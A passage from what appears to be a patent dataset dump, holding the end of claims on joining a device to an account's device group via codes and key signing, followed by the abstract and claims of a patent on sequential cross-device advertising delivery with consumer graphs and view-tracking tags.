transmitting, by the first device, the message to the second device. 24. The method of claim 21, wherein the second device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 25. The method of claim 21, wherein the message comprises an identifier of the first device. 26. The method of claim 21, further comprising:
transmitting, by the first device and to the second device, a request to join the group of related devices that comprises the second device. 27. The method of claim 21, wherein the centralized entity is a cloud services provider and the particular account comprises a cloud services account with the cloud services provider. 28. The method of claim 21, wherein the first code is randomly generated by the first device in a manner not reproducible by the centralized entity. 29. The method of claim 21, wherein the second code is generated in a manner reproducible by the centralized entity. 30. A non-transitory machine-readable medium comprising code that, when executed by one or more processors, cause the one or more processors to perform operations, the code comprising:
code to receive, by a first device of a group of related devices, input of a first code generated by a second device that is not established in the group of related devices; code to, responsive to the input, transmit, by the first device, a second code to the second device for authorization with a centralized entity for a particular user account; code to receive, by the first device and from the second device, a message associated with joining the group of related devices, the message being signed with a private key corresponding to the particular user account; and code to establish, by the first device, the second device in the group of related devices. 31. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to, prior to receiving, by the first device, the message signed with the private key corresponding to the particular user account:
receive, by the first device and from the second device, the message associated with joining the group of related devices, the message not being signed with the private key corresponding to the particular user account;
sign, by the first device, the message with a private key corresponding to the particular user account; and
transmit, by the first device, the signed message to the second device. 32. The non-transitory machine-readable medium of claim 30, wherein the first device is previously authorized with the centralized entity as another valid device for the particular user account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 33. The non-transitory machine-readable medium of claim 30, wherein the message comprises an identifier of the second device. 34. The non-transitory machine-readable medium of claim 30, wherein the centralized entity is a cloud services provider and the particular user account comprises a cloud services account with the cloud services provider. 35. The non-transitory machine-readable medium of claim 30, wherein the first code is randomly generated by the second device in a manner not reproducible by the centralized entity. 36. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to generate, by the first device, the second code in a manner reproducible by the centralized entity. 37. A device comprising:
a memory; and at least one processor configured to:
display a first code for entry on another device of a group of related devices;
receive, from the other device, a second code, the second code being received responsive to the first code being input on the other device;
use the second code to authorize the device as a valid device for a particular account with a centralized entity;
transmit, to the other device, a message associated with joining the group of related devices;
receive, from the other device, the message signed with a private key corresponding to the particular account; and
use the message to join the group of related devices. 38. The device of claim 37, wherein the at least one processor is further configured to:
prior to using the message to join the group of related devices, sign the message with a private key of the device. 39. The device of claim 38, wherein the message comprises an application to join the group of related devices and the at least one processor is configured to use the message to join the group of related devices by:
transmitting the message to the other device. 40. The device of claim 37, wherein the other device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the other device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. | 2,400 |
9,199 | 9,199 | 15,985,639 | 2,424 | The technology relates to sequential or tailored delivery of advertising content across a plurality of media conduits. The invention achieves sequential story telling for advertising campaigns in place of single-series advertising, by delivering over a period of several sessions on a variety of devices. An advertiser can air a campaign on a consumer individual's cell phone device, continue the second portion of the campaign via a desktop browser session, and conclude with the third portion of the campaign on the individual's OTT device. The technology provides advanced controls over targeting and scheduling with high precision. | 1. A method for delivering advertising content sequentially to a consumer across two or more display devices, the method comprising:
receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of two or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the two or more TV and mobile devices used by each consumer, demographic and online behavioral data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more slots for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV. 2. The method of claim 1, further comprising:
obtaining a second datum from the second performance tag for the second item of advertising content; and, optionally, instructing a third content provider to deliver an additional item of advertising content to an additional slot accessible to the consumer on a third device, based on the second datum, wherein the third device is optionally the same as either the first device or the second device. 3. The method of claim 1, wherein the first item of advertising content and the second item of advertising content are sequential parts of a narrative. 4. The method of claim 1, wherein the first datum comprises a confirmation whether the consumer has seen the first item of advertising content, and the second item of advertising content is not delivered to the consumer until the consumer has seen the first item of advertising content. 5. The method of claim 1, wherein the pool of consumers comprises a first group of consumers having a first threshold similarity to a member of the target audience, and a second group of consumers having a second threshold similarity to a member of the target audience, and wherein the first item of advertising content is present in two versions, and the first version is delivered to a first slot of inventory accessible to the first group of consumers and a second version is delivered to a second slot of inventory accessible to the second group of consumers. 6. The method of claim 1, wherein the first datum comprises an indication of whether the consumer has skipped or declined to view the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has skipped or declined to view the first item of advertising content. 7. The method of claim 1, wherein the first datum comprises an indication of whether the consumer has purchased a product featured in the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has purchased the product. 8. The method of claim 1, wherein the first slot is on a TV, and the second slot is on a mobile device. 9. The method of claim 8, wherein a second performance tag for the second item of advertising content includes a gross rating point, and wherein if the gross rating point is below a target number, one or more of the first and second items of advertising content, or a third item of advertising content, is delivered to a third slot of inventory accessible to the consumer on a TV. 10. A method for optimizing an advertising campaign, the method comprising:
receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of one or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors selected from: age range, gender, and location; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the devices used by each consumer, demographic data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more segments for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets based on the inventory; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV;
receiving a second datum from the second performance tag to validate whether a particular consumer viewed the second item of advertising content on the second device; and
applying a machine learning technique to the first and second performance tags, in order to improve the allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets. 11. A method of controlling sequential delivery of cross-screen advertising content to a consumer, the method comprising:
determining that the consumer is a member of a target audience; identifying a first and second device accessible to the consumer; receiving instructions for placement of a first and second item of advertising content on the first and second device, consistent with an advertising budget and the target audience; causing a first media conduit to deliver the first item of advertising content to the first device; and when the first item of advertising content has been viewed by the consumer, causing a second media conduit to deliver the second item of advertising content to the second device, wherein the first and second device comprise a TV and a mobile device. | The technology relates to sequential or tailored delivery of advertising content across a plurality of media conduits. The invention achieves sequential story telling for advertising campaigns in place of single-series advertising, by delivering over a period of several sessions on a variety of devices. An advertiser can air a campaign on a consumer individual's cell phone device, continue the second portion of the campaign via a desktop browser session, and conclude with the third portion of the campaign on the individual's OTT device. The technology provides advanced controls over targeting and scheduling with high precision.1. A method for delivering advertising content sequentially to a consumer across two or more display devices, the method comprising:
receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of two or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the two or more TV and mobile devices used by each consumer, demographic and online behavioral data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more slots for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV. 2. The method of claim 1, further comprising:
obtaining a second datum from the second performance tag for the second item of advertising content; and, optionally, instructing a third content provider to deliver an additional item of advertising content to an additional slot accessible to the consumer on a third device, based on the second datum, wherein the third device is optionally the same as either the first device or the second device. 3. The method of claim 1, wherein the first item of advertising content and the second item of advertising content are sequential parts of a narrative. 4. The method of claim 1, wherein the first datum comprises a confirmation whether the consumer has seen the first item of advertising content, and the second item of advertising content is not delivered to the consumer until the consumer has seen the first item of advertising content. 5. The method of claim 1, wherein the pool of consumers comprises a first group of consumers having a first threshold similarity to a member of the target audience, and a second group of consumers having a second threshold similarity to a member of the target audience, and wherein the first item of advertising content is present in two versions, and the first version is delivered to a first slot of inventory accessible to the first group of consumers and a second version is delivered to a second slot of inventory accessible to the second group of consumers. 6. The method of claim 1, wherein the first datum comprises an indication of whether the consumer has skipped or declined to view the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has skipped or declined to view the first item of advertising content. 7. The method of claim 1, wherein the first datum comprises an indication of whether the consumer has purchased a product featured in the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has purchased the product. 8. The method of claim 1, wherein the first slot is on a TV, and the second slot is on a mobile device. 9. The method of claim 8, wherein a second performance tag for the second item of advertising content includes a gross rating point, and wherein if the gross rating point is below a target number, one or more of the first and second items of advertising content, or a third item of advertising content, is delivered to a third slot of inventory accessible to the consumer on a TV. 10. A method for optimizing an advertising campaign, the method comprising:
receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of one or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors selected from: age range, gender, and location; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the devices used by each consumer, demographic data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more segments for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets based on the inventory; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV;
receiving a second datum from the second performance tag to validate whether a particular consumer viewed the second item of advertising content on the second device; and
applying a machine learning technique to the first and second performance tags, in order to improve the allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets. 11. A method of controlling sequential delivery of cross-screen advertising content to a consumer, the method comprising:
determining that the consumer is a member of a target audience; identifying a first and second device accessible to the consumer; receiving instructions for placement of a first and second item of advertising content on the first and second device, consistent with an advertising budget and the target audience; causing a first media conduit to deliver the first item of advertising content to the first device; and when the first item of advertising content has been viewed by the consumer, causing a second media conduit to deliver the second item of advertising content to the second device, wherein the first and second device comprise a TV and a mobile device. | 2,400 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.